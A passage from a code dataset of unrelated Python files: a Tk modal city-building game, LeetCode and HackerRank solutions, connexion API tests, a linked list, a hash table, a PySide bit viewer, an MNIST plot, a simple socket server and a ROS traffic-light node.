objects.Tree.trees.remove(deadTree)\n\n # choose tree option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 650 - mode.buttonR) and\n (y <= 650 + mode.buttonR) and\n (mode.treeUnlocked == True)):\n mode.addTree = True\n mode.treeOutline = 'red'\n\n # add new tree\n elif mode.addTree == True:\n if play.Play.isValid(mode, x, y, mode.treeR):\n objects.Tree.trees.append((x, y))\n mode.addTree = False\n mode.TreeOutline = 'white'\n \n def keyPressed(mode, event):\n if event.key == 'p':\n mode.paused = not mode.paused\n elif (event.key == 'Enter') and (mode.windowOn == True):\n if mode.gameEnd != True:\n mode.windowOn = False\n mode.paused = False\n mode.move = True\n elif (event.key == 's') and (mode.paused == True):\n mode.takeStep()\n\n def takeStep(mode):\n mode.year += 1\n play.Play.moveHuman(mode)\n \n # humans immigrate to the town every 100 years\n if mode.year % 100 == 0 and mode.year != 0:\n newHumans = random.randint(1, 4)\n for i in range(newHumans):\n play.Play.getNewHuman(mode, mode.rows//2, 1)\n \n # progress 1: unlocked new tipis\n if mode.year == 100:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.tipiUnlocked = True\n mode.version = 1\n mode.windowOn = True\n\n # progress 2: unlocked stone houses\n if mode.year == 225:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.houseUnlocked = True\n mode.version = 2\n mode.windowOn = True\n \n # progress 10: unlocked skyscrapers by upgrading all tipis to houses\n if len(objects.Tipi.tipis) == 0 and mode.message1 == False:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.skyscraperUnlocked = True\n mode.tipiUnlocked = False\n mode.version = 10\n mode.windowOn = True\n mode.message1 = True\n\n # after 3 skyscrapers are placed, unlock the option of planting trees\n if len(objects.Skyscraper.skyscrapers) == 5 and mode.message2 == False:\n mode.paused = True\n mode.addTipi = mode.addHouse = mode.addSkyscraper = mode.addTree = False\n mode.treeUnlocked = True\n mode.version = 15\n mode.windowOn = True\n mode.message2 = True\n print('sky unlocked', mode.skyscraperUnlocked) # True\n print('addSkyscraper', mode.addSkyscraper) # False\n\n # end game: overpopulation or lack of resources or no more disasters\n if (len(mode.humans) >= 75) or (len(objects.Tree.trees) == 0) or (len(mode.possibleDisasters) == 0):\n mode.paused = True\n mode.version = 100\n mode.windowOn = True\n disaster.Disaster.end(mode)\n mode.gameEnd = True\n\n # starting at year 250, every 200 years there's a chance of a disaster occurring\n if ((mode.year - 350) % 100 == 0) and (mode.year >= 350):\n current = random.choice(mode.possibleDisasters)\n mode.paused = True\n mode.addTipi = mode.addHouse = False\n if current == None:\n mode.paused = False\n if current == 'pandemic':\n mode.version = 3\n mode.windowOn = True\n disaster.Disaster.pandemic(mode)\n mode.possibleDisasters.remove('pandemic')\n elif current == 'famine':\n mode.version = 4\n mode.windowOn = True\n disaster.Disaster.famine(mode)\n mode.possibleDisasters.remove('famine')\n elif current == 'wildfire':\n mode.version = 5\n mode.windowOn = True\n disaster.Disaster.wildfire(mode)\n mode.possibleDisasters.remove('wildfire')\n elif current == 'earthquake':\n mode.version = 6\n mode.windowOn = True\n disaster.Disaster.earthquake(mode)\n mode.possibleDisasters.remove('earthquake')\n\n # end game: overpopulation, war, pollution\n if (len(mode.humans) >= 75) or (len(objects.Tree.trees) == 0):\n mode.paused = True\n mode.version = 100\n mode.windowOn = True\n disaster.Disaster.end(mode)\n mode.gameEnd = True\n \n def timerFired(mode):\n if not mode.paused:\n mode.takeStep()\n\n def redrawAll(mode, canvas):\n frames.Frame.draw(mode, canvas)\n frames.Info.draw(mode, canvas, mode.year, mode.population)\n\n objects.WelcomeSign.draw(mode, canvas)\n objects.Lake.draw(mode, canvas)\n objects.Mountain.draw(mode, canvas)\n objects.Tipi.draw(mode, canvas)\n objects.House.draw(mode, canvas)\n objects.Skyscraper.draw(mode, canvas)\n objects.Tree.draw(mode, canvas)\n if mode.windowOn:\n message.Message.draw(mode, canvas)\n \n if mode.move:\n objects.Human.draw(mode, canvas)\n if mode.windowOn:\n message.Progress.draw(mode, canvas)\n\n# CITATION: the MyModalApp class framework from cmu 112 notes\n# https://www.cs.cmu.edu/~112/notes/notes-animations-part3.html\nclass MyModalApp(ModalApp):\n def appStarted(app):\n\n app.margin = 20\n app.boxX = 120\n app.boxY = 50\n app.backX = 50\n app.backY = 20\n app.backHeight = app.height - 3*app.margin\n app.buttonR = 50\n app.create = None\n\n app.drawStart = app.loadImage('drawend.png')\n app.drawStart = app.scaleImage(app.drawStart, 1/1.35)\n\n app.welcomeMode = WelcomeMode()\n app.gameMode = GameMode()\n app.instructsMode = InstructsMode()\n app.chooseMode = ChooseMode()\n\n app.createMode = CreateMode()\n app.setActiveMode(app.welcomeMode)\n\napp = MyModalApp(width=1500, height=800)","sub_path":"meso.py","file_name":"meso.py","file_ext":"py","file_size_in_byte":28074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428975956","text":"import operator\narr = []\ntry:\n while True:\n arr.append(input())\nexcept:\n pass\narr = arr[1:-1]\narr = [i.strip()[1:-1].replace(\"]\", \"\").split(\",\") for i in arr]\nmatrix = [[int(j) for j in i] for i in arr]\n\nm = len(matrix)\nn = len(matrix[0])\n\ndp = [[1] * n for i in range(m)]\n\nslist = sorted([(i, j, val)\n for i, row in enumerate(matrix)\n for j, val in enumerate(row)], key=operator.itemgetter(2))\n\nfor x, y, val in slist:\n for dx, dy in zip([1, 0, -1, 0], [0, 1, 0, -1]):\n nx, ny = x + dx, y + dy\n if 0 <= nx < m and 0 <= ny < n and matrix[nx][ny] > matrix[x][y]:\n dp[nx][ny] = max(dp[nx][ny], dp[x][y] + 1)\nprint(max(max(x) for x in dp))","sub_path":"Code/CodeRecords/2773/49361/293587.py","file_name":"293587.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9803773","text":"#\n# @lc app=leetcode.cn id=64 lang=python3\n#\n# [64] 最小路径和\n#\n\n# @lc code=start\nclass Solution:\n def minPathSum(self, grid: List[List[int]]) -> int:\n # 要从左上角到右下角的路径和,到(i, j)的路径和,即为pd[m-1][n-1]\n # m * n 网格\n m = len(grid)\n n = len(grid[0])\n dp = [[0]*n for _ in range(m)]\n\n # 初始值\n dp[0][0] = grid[0][0]\n for i in range(1, n):\n dp[0][i] = grid[0][i] + dp[0][i-1]\n\n for i in range(1, m):\n dp[i][0] = grid[i][0] + dp[i-1][0]\n\n for i in range(1, m):\n for j in range(1, n):\n dp[i][j] = grid[i][j] + min(dp[i-1][j], dp[i][j-1])\n \n return dp[m-1][n-1]\n# @lc code=end\n\n","sub_path":"动态规划/64.最小路径和.py","file_name":"64.最小路径和.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64971110","text":"#\n# run me with nosetests -vs test_oas.py\n#\nimport logging\nimport sys\n\nimport connexion\nfrom connexion.resolver import Resolver\nfrom flask_testing import TestCase\n\nme = sys.modules[__name__]\n\n\ndef noop(*args, **kwds): raise NotImplementedError\n\n\nclass FakeResolver(Resolver):\n\n def resolve_operation_id(self, operation):\n \"\"\"\n Mock operation id, just to validate API.\n :type operation: connexion.operations.AbstractOperation\n \"\"\"\n oid = operation.operation_id\n if \".\" in oid:\n oid = oid.split(\".\")[-1]\n # Append the operation function to this module.\n setattr(me, oid, noop)\n return \"test_oas.\" + oid\n\n\nclass BaseTestCase(TestCase):\n\n def create_app(self):\n logging.getLogger('connexion.operation').setLevel('ERROR')\n app = connexion.App(__name__, specification_dir='.')\n app.add_api('spid.yaml')\n app.app.config[\"SAML_PATH\"] = \"saml/\"\n return app.app\n\n\ndef test_oas3():\n files = (\"spid.yaml\", )\n\n def assert_parse_oas3(zapp, f):\n zapp.add_api(f, resolver=FakeResolver())\n\n for f in files:\n zapp = connexion.FlaskApp(__name__, specification_dir='.',)\n yield assert_parse_oas3, zapp, f\n\n\nclass TestPublicController(BaseTestCase):\n \"\"\"PublicController integration test stubs\"\"\"\n\n def test_get_echo_401(self):\n \"\"\"Test case for get_echo\n \"\"\"\n response = self.client.open(\n '/echo',\n method='GET')\n self.assert401(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_metadata_unauthenticated(self):\n \"\"\"Test case for get_metadata\n \"\"\"\n response = self.client.open(\n '/metadata',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n","sub_path":"python-flask-spid/test_oas.py","file_name":"test_oas.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213886432","text":"class LinkedList:\n \"\"\"Serves a different purpose in comparison to built-in list.\"\"\"\n\n # Inviside to the outside (by using two underscores)\n class __Node:\n def __init__(self, item, next=None):\n \"\"\"\n One node has two parts, one is the value itself (item),\n the other half points/references to the next node (next).\n \"\"\"\n self.item = item\n self.next = next\n\n def get_item(self):\n return self.item\n\n def get_next(self):\n return self.next\n\n def set_item(self, item):\n self.item = item\n\n def set_next(self, next):\n self.next = next\n\n def __init__(self, contents={}):\n # Both point to a dummy node to begin with (alway the 1st, no `item`(val))\n self.first = LinkedList.__Node(None, None)\n self.last = self.first\n\n self.num_items = 0\n\n for cont in contents:\n self.append(cont)\n\n def append(self, item):\n \"\"\"\n Each append will always take the same amount of time (O(1)).\n But of course, it also takes up twice the spce of a random accessible\n list since there has to be room for both the refs to {item, next node}.\n \"\"\"\n node = LinkedList.__Node(item)\n self.last.set_next(node)\n self.last = node\n self.num_items += 1\n\n def insert(self, index, item):\n \"\"\"\n Suits for doing many inserts near the beginning of a list.\n\n Either inserts into the specified location (with O(ELEM_BEFORE)),\n or simply append to the end of the list (with O(1)).\n\n Two scenarios where the complexity would be O(1)\n - insert at the beginning of a list\n - the index is greater than current size (therefore append)\n \"\"\"\n cursor = self.first\n\n if index < self.num_items:\n for i in range(index):\n cursor = cursor.get_next()\n\n node = LinkedList.__Node(item, cursor.get_next())\n cursor.set_next(node)\n self.num_items += 1\n else:\n self.append(item)\n\n def __getitem__(self, index):\n \"\"\"\n Impractical impl (O(N)). Use list if random access is desired.\n Linked lists require linear search to access a particular location.\n \"\"\"\n if index >= 0 and index < self.num_items:\n cursor = self.first.get_next()\n for i in range(index):\n cursor = cursor.get_next()\n\n return cursor.get_item()\n\n raise IndexError(\"LinkedList index out of range (get)\")\n\n def __setitem__(self, index, val):\n \"\"\"\n Impractical impl (O(N)). Use list if random access is desired.\n Linked lists require linear search to access a particular location.\n \"\"\"\n if index >= 0 and index < self.num_items:\n cursor = self.first.get_next()\n for i in range(index):\n cursor = cursor.get_next()\n\n cursor.set_item(val)\n return None\n\n raise IndexError(\"LinkedList assignment out of range (set)\")\n\n def __add__(self, other):\n \"\"\"\n Given [1, 3] & [2, 0], excepts [1, 3, 2, 0], aka \"concatenation\".\n \"\"\"\n # Don't use fixed isinstance(X, CLS), it'd fail if being imported.\n if type(self) != type(other):\n raise TypeError(\n f\"Concatenate undefined for \"\n f\"{str(type(self))} + {str(type(other))}\"\n )\n\n result = LinkedList()\n\n # Skip the 1st element as there's no value inside (`item`)\n cursor_self = self.first.get_next()\n\n while cursor_self is not None:\n result.append(cursor_self.get_item())\n cursor_self = cursor_self.get_next()\n\n # Skip the 1st element as there's no value inside (`item`)\n cursor_other = other.first.get_next()\n\n while cursor_other is not None:\n result.append(cursor_other.get_item())\n cursor_other = cursor_other.get_next()\n\n return result\n","sub_path":"chap04_sequences/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"467851883","text":"import sys\nsys.path.append(\"../dictionary_tree/dictionary\")\nfrom dictionaryUnorderedLinkedList import DictionaryUnorderedLinkedList\nimport hashFunctions\n\nclass DictCollisionListHash:\n \"\"\" Implementa una tabella hash con liste di collisione.\n\n Supporta le classiche operazioni di insert, search and delete key.\n \"\"\"\n def __init__(self, size, singleHashFunction):\n if type(size) is not int:\n raise ValueError\n self.lists = size * [None]\n self.size = size\n for i in range(size):\n self.lists[i] = DictionaryUnorderedLinkedList()\n self.hashFunction = singleHashFunction\n\n def insert(self, key, value):\n ind = self.hashFunction.hash(key, self.size)\n self.lists[ind].insert(key, value)\n\n def delete(self, key):\n ind = self.hashFunction.hash(key, self.size)\n self.lists[ind].delete(key)\n\n def search(self, key):\n ind = self.hashFunction.hash(key, self.size)\n return self.lists[ind].search(key)\n\n def stampa(self):\n for i in range(0, self.size):\n self.lists[i].theList.stampa()\n\n\nif __name__ == \"__main__\":\n size = 13;\n fdiv = hashFunctions.HashFunction_module()\n frip = hashFunctions.HashFunction_Adv()\n\n print (\"Metodo divisione\")\n\n diz = DictCollisionListHash(size, fdiv)\n for i in range(0, 30):\n print (\"insert(\" + str(i) + \",\" + str(2 * i) + \")\")\n diz.insert(i, 2 * i)\n diz.stampa()\n\n print (\"Metodo ripiegamento\")\n\n diz = DictCollisionListHash(size, frip)\n for i in range(0, 30):\n print (\"insert(\" + str(i) + \",\" + str(2 * i) + \")\")\n diz.insert(i, 2 * i)\n diz.stampa()\n\n","sub_path":"hash_table/collisionsListHash.py","file_name":"collisionsListHash.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349488157","text":"import struct\r\nimport ctypes\r\nfrom PySide import QtGui\r\nfrom PySide.QtCore import Qt, QPoint\r\nfrom ui.MainWindow_ui import Ui_MainWindow\r\nfrom app_info import APP_INFO\r\n\r\n\r\nBITS_PER_NIBBLE = 4\r\nNIBBLES_PER_ROW = 8\r\nROW_CNT = 2 # Adjust to 1 for 32-bit, 4 for 128-bit\r\n\r\nMAX_BIT_POS = (BITS_PER_NIBBLE * NIBBLES_PER_ROW * ROW_CNT) - 1\r\n\r\nMAX_U64 = 2 ** (MAX_BIT_POS + 1) - 1\r\nMIN_U64 = 0\r\nMAX_S64 = 2 ** MAX_BIT_POS - 1\r\nMIN_S64 = (~((1 << MAX_BIT_POS) - 1))\r\n\r\nMAX_U32 = 2 ** (32 + 1) - 1\r\nMIN_U32 = 0\r\nMAX_S32 = 2 ** 32 - 1\r\nMIN_S32 = (~((1 << 32) - 1))\r\n\r\nROW_HEIGHT = 100\r\nROW_WIDTH = 950\r\n\r\nNIB_MGN = 5\r\nNIB_WIDTH = (ROW_WIDTH - (NIB_MGN * (NIBBLES_PER_ROW + 1)))/NIBBLES_PER_ROW\r\n\r\nBIT_MGN = 3\r\nBIT_WIDTH = (NIB_WIDTH - (BIT_MGN * (BITS_PER_NIBBLE + 1)))/BITS_PER_NIBBLE\r\n\r\n\r\nclass ValUnion(ctypes.Union):\r\n _fields_ = [(\"uint64\", ctypes.c_uint64),\r\n (\"int64\", ctypes.c_int64),\r\n (\"double\", ctypes.c_double),\r\n (\"uint32\", ctypes.c_uint32),\r\n (\"int32\", ctypes.c_int32),\r\n (\"float\", ctypes.c_float)]\r\n\r\n\r\nclass MainWindow(QtGui.QMainWindow, Ui_MainWindow):\r\n def __init__(self, *args, **kwargs):\r\n super(MainWindow, self).__init__(*args, **kwargs)\r\n\r\n self._line_bit_val_map = {}\r\n self._label_bit_pos_map = {}\r\n self._label_nib_val_lst = []\r\n\r\n self._last_val_cache = {} # key is QLineEdit, val is last val\r\n\r\n self.setupUi(self)\r\n self.init_ui()\r\n\r\n self.resize(self.width(), self.height() + ROW_CNT * ROW_HEIGHT + self.gridLayout.getContentsMargins()[3])\r\n\r\n self.setWindowTitle(APP_INFO.APP_NAME)\r\n self.setWindowIcon(QtGui.QIcon(\":/icons/icon.ico\"))\r\n\r\n self.actionAbout.triggered.connect(self.actionAbout_triggered)\r\n self.actionAbout_Qt.triggered.connect(self.actionAbout_Qt_triggered)\r\n\r\n def actionAbout_triggered(self):\r\n QtGui.QMessageBox.about(\r\n self,\r\n APP_INFO.APP_NAME,\r\n \"\"\"\r\n

{APP_NAME}

\r\n
\r\n Author: {APP_AUTHOR}
\r\n Version: {Major}.{Minor}.{Revision}
\r\n \"\"\".format(\r\n APP_NAME=APP_INFO.APP_NAME,\r\n APP_AUTHOR=APP_INFO.APP_AUTHOR,\r\n Major=APP_INFO.APP_VERSION.Major,\r\n Minor=APP_INFO.APP_VERSION.Minor,\r\n Revision=APP_INFO.APP_VERSION.Revision\r\n )\r\n )\r\n\r\n def actionAbout_Qt_triggered(self):\r\n QtGui.QMessageBox.aboutQt(self)\r\n\r\n def init_ui(self):\r\n # get default line edit height for some calculations\r\n line_edit_height = self.line_uhex64.size().height()\r\n\r\n for row in xrange(ROW_CNT):\r\n for nib in xrange(NIBBLES_PER_ROW):\r\n lb_nib_val = QtGui.QLabel(self.wgt_bit_cont)\r\n size = lb_nib_val.size()\r\n size.setWidth(NIB_WIDTH)\r\n lb_nib_val.resize(size)\r\n lb_nib_val.move(\r\n NIB_MGN + (NIB_WIDTH + NIB_MGN) * nib,\r\n row * ROW_HEIGHT)\r\n lb_nib_val.setAlignment(Qt.AlignHCenter)\r\n lb_nib_val.setText('0')\r\n self._label_nib_val_lst.insert(0, lb_nib_val)\r\n\r\n for bit in xrange(BITS_PER_NIBBLE):\r\n line_bit_val = QtGui.QLineEdit(self.wgt_bit_cont)\r\n line_bit_val.setReadOnly(True)\r\n line_bit_val.setMaxLength(1)\r\n line_bit_val.move(\r\n NIB_MGN + (NIB_MGN + NIB_WIDTH) * nib + BIT_MGN + bit * (BIT_WIDTH + BIT_MGN),\r\n row * ROW_HEIGHT + 20)\r\n size = line_bit_val.size()\r\n size.setWidth(BIT_WIDTH)\r\n line_bit_val.resize(size)\r\n line_bit_val.setAlignment(Qt.AlignHCenter)\r\n line_bit_val.setText(\"0\")\r\n\r\n def mkfunc(line):\r\n return lambda: self._bit_val_edited(line)\r\n line_bit_val.editingFinished.connect(mkfunc(line_bit_val))\r\n\r\n def mkfunc(line):\r\n return lambda ev: self._bit_val_double_click(line, ev)\r\n line_bit_val.mouseDoubleClickEvent = mkfunc(line_bit_val)\r\n\r\n bit_pos = MAX_BIT_POS - (BITS_PER_NIBBLE * nib) - (BITS_PER_NIBBLE * NIBBLES_PER_ROW * row) - bit\r\n\r\n self._line_bit_val_map[bit_pos] = line_bit_val\r\n\r\n lb_bit_pos = QtGui.QLabel(self.wgt_bit_cont)\r\n lb_bit_pos.move(\r\n NIB_MGN + (NIB_MGN + NIB_WIDTH) * nib + BIT_MGN + bit * (BIT_WIDTH + BIT_MGN),\r\n row * ROW_HEIGHT + 20 + line_edit_height)\r\n lb_bit_pos.setFixedWidth(BIT_WIDTH)\r\n lb_bit_pos.setAlignment(Qt.AlignHCenter)\r\n lb_bit_pos.setText(str(bit_pos))\r\n lb_bit_pos.mouseDoubleClickEvent = mkfunc(line_bit_val)\r\n\r\n self._label_bit_pos_map[bit_pos] = lb_bit_pos\r\n\r\n for (line, base, fmt, minv, maxv, field) in (\r\n (self.line_udec64, 10, \"d\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_sdec64, 10, \"d\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_udec32, 10, \"d\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_sdec32, 10, \"d\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_uhex64, 16, \"X\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_shex64, 16, \"X\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_uhex32, 16, \"X\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_shex32, 16, \"X\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_uoct64, 8, \"o\", MIN_U64, MAX_U64, \"uint64\"),\r\n (self.line_soct64, 8, \"o\", MIN_S64, MAX_S64, \"int64\"),\r\n (self.line_uoct32, 8, \"o\", MIN_U32, MAX_U32, \"uint32\"),\r\n (self.line_soct32, 8, \"o\", MIN_S32, MAX_S32, \"int32\"),\r\n (self.line_binary, 2, \"b\", MIN_U64, MAX_U64, \"uint64\")\r\n ):\r\n def mkfunc(line, base, fmt, minv, maxv, field):\r\n return lambda: self._handle_i_edited(line, base, fmt, minv, maxv, field)\r\n line.editingFinished.connect(mkfunc(line, base, fmt, minv, maxv, field))\r\n self._last_val_cache[line] = \"\"\r\n\r\n self.line_float.editingFinished.connect(lambda: self._handle_f_edited(self.line_float, \"float\"))\r\n self._last_val_cache[self.line_float] = ''\r\n self.line_double.editingFinished.connect(lambda: self._handle_f_edited(self.line_double, \"double\"))\r\n self._last_val_cache[self.line_double] = ''\r\n\r\n def _handle_i_edited(self, line, base, fmt, minval, maxval, field):\r\n msg = None\r\n text = line.text().replace(' ', '')\r\n\r\n if self._last_val_cache[line] == text:\r\n return\r\n\r\n try:\r\n val = int(text, base)\r\n if val > maxval:\r\n msg = \"Exceeded max value of \" + format(maxval, fmt)\r\n elif val < minval:\r\n msg = \"Under min value of \" + format(minval, fmt)\r\n except ValueError:\r\n msg = \"Invalid format.\"\r\n except Exception:\r\n msg = \"Unknown error.\"\r\n\r\n if msg is None:\r\n union = ValUnion()\r\n setattr(union, field, val)\r\n self._set_new_val(union)\r\n else:\r\n line.setStyleSheet(\"border: 1px solid red\")\r\n line.setToolTip(msg)\r\n QtGui.QToolTip.showText(line.mapToGlobal(QPoint(0, 0)), msg)\r\n\r\n def _handle_f_edited(self, line, field):\r\n msg = None\r\n text = line.text().replace(' ', '')\r\n\r\n if self._last_val_cache[line] == text:\r\n return\r\n\r\n try:\r\n val = float(text)\r\n except ValueError:\r\n msg = \"Invalid format.\"\r\n except Exception:\r\n msg = \"Unknown error.\"\r\n\r\n if msg is None:\r\n union = ValUnion()\r\n setattr(union, field, val)\r\n self._set_new_val(union)\r\n else:\r\n line.setStyleSheet(\"border: 1px solid red\")\r\n line.setToolTip(msg)\r\n QtGui.QToolTip.showText(line.mapToGlobal(QPoint(0, 0)), msg)\r\n\r\n def _bit_val_double_click(self, line, event):\r\n text = line.text()\r\n if text == '0':\r\n line.setText('1')\r\n else:\r\n line.setText('0')\r\n self._bit_val_edited(line)\r\n\r\n def _bit_val_edited(self, line):\r\n text = line.text()\r\n if text not in ('0', '1'):\r\n line.setText('0')\r\n\r\n new_val = 0\r\n for bit_pos, line_edit in self._line_bit_val_map.iteritems():\r\n to_set = line_edit.text() == '1'\r\n\r\n if to_set:\r\n new_val |= (1 << bit_pos)\r\n\r\n union = ValUnion()\r\n union.uint64 = new_val\r\n self._set_new_val(union)\r\n\r\n def _set_new_val(self, union):\r\n\r\n for line, fmt, line_val in (\r\n (self.line_udec64, \"{:d}\", union.uint64),\r\n (self.line_sdec64, \"{:d}\", union.int64),\r\n (self.line_uhex64, \"{:016X}\", union.uint64),\r\n (self.line_shex64, \"{:016X}\", union.int64),\r\n (self.line_uoct64, \"{:o}\", union.uint64),\r\n (self.line_soct64, \"{:o}\", union.int64),\r\n (self.line_binary, \"{:064b}\", union.uint64)\r\n ):\r\n line.setText(fmt.format(line_val))\r\n self._last_val_cache[line] = line.text()\r\n line.setStyleSheet(\"\")\r\n line.setToolTip(\"\")\r\n\r\n for line, fmt, line_val in (\r\n (self.line_udec32, \"{:d}\", union.uint32),\r\n (self.line_sdec32, \"{:d}\", union.int32),\r\n (self.line_uhex32, \"{:08X}\", union.uint32),\r\n (self.line_shex32, \"{:08X}\", union.int32),\r\n (self.line_uoct32, \"{:o}\", union.uint32),\r\n (self.line_soct32, \"{:o}\", union.int32)\r\n ):\r\n line.setText(fmt.format(line_val))\r\n self._last_val_cache[line] = line.text()\r\n line.setStyleSheet(\"\")\r\n line.setToolTip(\"\")\r\n\r\n self.line_float.setText(str(union.float))\r\n self._last_val_cache[line] = self.line_float.text()\r\n self.line_float.setStyleSheet(\"\")\r\n self.line_float.setToolTip(\"\")\r\n\r\n self.line_double.setText(str(union.double))\r\n self._last_val_cache[line] = self.line_double.text()\r\n self.line_double.setStyleSheet(\"\")\r\n self.line_double.setToolTip(\"\")\r\n\r\n uval = union.uint64\r\n for bit_pos in xrange(MAX_BIT_POS + 1):\r\n line = self._line_bit_val_map.get(bit_pos)\r\n lbl = self._label_bit_pos_map.get(bit_pos)\r\n\r\n bit_val = (uval >> bit_pos) & 1\r\n line.setText(str(bit_val))\r\n\r\n fnt = line.font()\r\n if bit_val == 1:\r\n fnt.setBold(True)\r\n else:\r\n fnt.setBold(False)\r\n line.setFont(fnt)\r\n\r\n fnt = lbl.font()\r\n if bit_val == 1:\r\n fnt.setBold(True)\r\n else:\r\n fnt.setBold(False)\r\n lbl.setFont(fnt)\r\n\r\n for nib in xrange((MAX_BIT_POS + 1)/BITS_PER_NIBBLE):\r\n nib_val = (uval >> (nib * BITS_PER_NIBBLE)) & 0xF\r\n lbl = self._label_nib_val_lst[nib]\r\n lbl.setText('{:X}'.format(nib_val))\r\n","sub_path":"src/widgets/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":11390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386899240","text":"\"\"\"\nGiven a sequence of integers, where each element is distinct and satisfies . For each where , find any integer such that and print the value of on a new line.\n\nFor example, assume the sequence . Each value of between and , the length of the sequence, is analyzed as follows:\n\n, so \n, so \n, so \n, so \n, so \nThe values for are .\n\nFunction Description\n\nComplete the permutationEquation function in the editor below. It should return an array of integers that represent the values of .\n\npermutationEquation has the following parameter(s):\n\np: an array of integers\nInput Format\n\nThe first line contains an integer , the number of elements in the sequence.\nThe second line contains space-separated integers where .\n\nConstraints\n\n, where .\nEach element in the sequence is distinct.\nOutput Format\n\nFor each from to , print an integer denoting any valid satisfying the equation on a new line.\n\nSample Input 0\n\n3\n2 3 1\nSample Output 0\n\n2\n3\n1\nExplanation 0\n\nGiven the values of , , and , we calculate and print the following values for each from to :\n\n, so we print the value of on a new line.\n, so we print the value of on a new line.\n, so we print the value of on a new line.\nSample Input 1\n\n5\n4 3 5 1 2\nSample Output 1\n\n1\n3\n5\n4\n2\n\"\"\"\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the permutationEquation function below.\n\n\ndef permutationEquation(p):\n # 이 문제는 생각하기 간단하면서도, 생각이 제대로 안떠오르면 어려운 문제다.\n # p.index(p.index)를 넣어 사용하는 문제라...\n\n # pythonic solution 1\n # return [(p.index(p.index(i)+1)+1) for i in range(1, max(p)+1)]\n\n # my solution 2\n result = []\n for i in range(1, max(p)+1):\n result.append(p.index(p.index(i)+1)+1)\n return result\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n p = list(map(int, input().rstrip().split()))\n\n result = permutationEquation(p)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","sub_path":"problem_solving/2020-03-12-Sequence-Equation.py","file_name":"2020-03-12-Sequence-Equation.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"84473476","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\ndatas=pd.read_csv(\"mnist_train.csv\",header=None)\r\nprint(datas.shape)\r\ncolumnss=['label']\r\nfor i in range(784):\r\n columnss.append(f\"px_{i}\")\r\ndatas.columns=columnss\r\nsize_of_image=28\r\nmatrix_datas=datas.values\r\ndigit=matrix_datas[0,:]\r\ndigit=digit[1:]\r\nprint(digit.shape);\r\nimage=digit.reshape(28,28)\r\nprint(image.shape)\r\nplt.plot(image,color='k')\r\nplt.show()\r\n\r\n\r\n","sub_path":"T/letter recognition. pandas.py","file_name":"letter recognition. pandas.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248706848","text":"import socket\n\nsock = socket.socket()\nhost = ''\nport = 5050\nsock.bind((host, port))\nsock.listen(1)\nconn, addr = sock.accept()\n\nprint('connected:', addr)\nf = conn.recv(1024)\nprint(f.decode('utf-8'))","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42346587","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport time\n\n\nclass TLScanner(object):\n def __init__(self):\n rospy.init_node('tl_scanner')\n\n self.light_classifier = TLClassifier()\n\n self.camera_image = None\n self.bridge = CvBridge()\n\n self.min_interval = 0.25\n self.prev_time = time.time()\n\n rospy.Subscriber('/image_color', Image, self.image_cb)\n rospy.spin()\n\n def image_cb(self, msg):\n delta_time = time.time() - self.prev_time\n if delta_time >= self.min_interval:\n self.prev_time = time.time()\n else:\n return\n\n self.camera_image = msg\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"rgb8\")\n self.light_classifier.infer(cv_image)\n\n\nif __name__ == '__main__':\n try:\n TLScanner()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_scanner.py","file_name":"tl_scanner.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298617021","text":"#!usr/bin/env python\nimport os\n\nfrom 